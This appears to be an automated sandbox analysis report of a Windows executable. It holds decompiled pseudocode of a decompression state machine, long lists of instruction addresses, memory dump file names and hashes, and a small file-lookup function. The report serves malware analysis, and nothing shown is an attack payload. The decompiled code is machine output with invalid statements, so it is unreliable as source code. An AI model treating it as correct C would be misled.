						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406bfe
0x00406bfe
0x00406c03
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x00000000
0x004072dd
0x00406c05
0x00406c05
0x00406c09
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c2a
0x00406c31
0x00406c34
0x00406c3f
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4e
0x00406c6c
0x00406c6e
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e93
0x00406e96
0x00406e39
0x00406e3f
0x00000000
0x00000000
0x00000000
0x00406e98
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e36
0x00000000
0x00406e36
0x00406c50
0x00406c50
0x00406c53
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d42
0x00406d45
0x00406cbc
0x00406cbc
0x00406cc2
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dcf
0x00406dd2
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d72
0x00406d72
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406ddd
0x00406ddd
0x00406de0
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00406fa9
0x00406fa9
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x00406cce
0x00000000
0x00000000
0x00000000
0x00406d4b
0x00406c97
0x00406c9b
0x00407408
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb9
0x00000000
0x00406cb9
0x00406d45
0x00406c4e
0x00406a82
0x00406a82
0x00406a8b
0x00407499
0x00407499
0x00000000
0x00407499
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x00000000
0x00407267
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x00000000
0x004073da
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00000000
0x0040722f
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040683D(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426758); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426758;
			}

0x00406848
0x00406851
0x00000000
0x0040685e
0x00406854
0x00000000

APIs

FindFirstFileW.KERNELBASE(76D23420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,76D23420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76D23420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
FindClose.KERNEL32(00000000), ref: 00406854

Strings

XgB, xrefs: 0040683E

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
